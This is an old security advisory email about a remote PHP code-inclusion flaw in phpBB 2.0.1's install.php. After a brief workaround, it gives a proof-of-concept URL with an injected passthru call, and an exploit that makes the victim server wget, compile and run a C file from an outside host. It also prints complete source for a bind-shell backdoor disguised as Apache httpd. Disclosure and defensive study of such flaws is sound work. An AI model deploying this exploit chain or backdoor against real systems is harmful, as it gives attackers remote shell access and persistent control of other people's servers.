[UNIX] Malicious PHP Source Injection in phpBB (install.php)

From: support@securiteam.com
Date: 06/18/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 20:05:09 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Malicious PHP Source Injection in phpBB (install.php)
------------------------------------------------------------------------

SUMMARY

phpBB is one of popular PHP bulletin board systems. When "allow_url_fopen"
is set to "On" and "register_globals" is also set to "On" (in php.ini),
phpBB contains a vulnerability in its install.php code that will allow
attackers to insert malicious PHP code into existing web pages.

DETAILS

Vulnerable systems:
 * phpBB 2.0.1

Workaround:
Set "allow_url_fopen" to "Off" and "register_globals" to "Off". After you
have completed the installation process remove or rename the install.php
script. Or modify the install.php:

Find:

define('IN_PHPBB', true);
$phpbb_root_path='./';

Replace it with just:
$phpbb_root_dir='./';

Example:
Create the following file:
--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------

And then type in the following URL:
http://URL/install.php?phpbb_root_dir=http://MYBOX/

This will result in something similar to:
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output
started at http://host/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182

Warning: Cannot add header information - headers already sent by (output
started at http://host/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183

Warning: Cannot add header information - headers already sent by (output
started at http://host/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/install.php on line 346

Exploit:
The following exploit code will download a C file, compile it, execute it,
and cause a backdoor to open up on the remote server.

PHP code:
<? passthru("cd /tmp && /usr/bin/wget http://host/a.c && gcc a.c -o ... &&
rm /tmp/a.c && /tmp/... "); ?>

Backdoor code:
/*
 * Unknown author.
 */

#define PORT 13534
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main (int argc, char *argv[])
{
    int i;
    for(i=0;i<argc;i++) {
      memset(argv[i],'\x0',strlen(argv[i]));
    };
    strcpy(argv[0],"/usr/local/apache/bin/httpd");

    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    if (fork() != 0)
        exit(0);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
&soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli,0);
            dup2(soc_cli,1);
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0);
            close(soc_cli);
            exit(0);
        }
    close(soc_cli);
    }
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:onlooker@cnun.xsdeny.net>
morris Chang.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages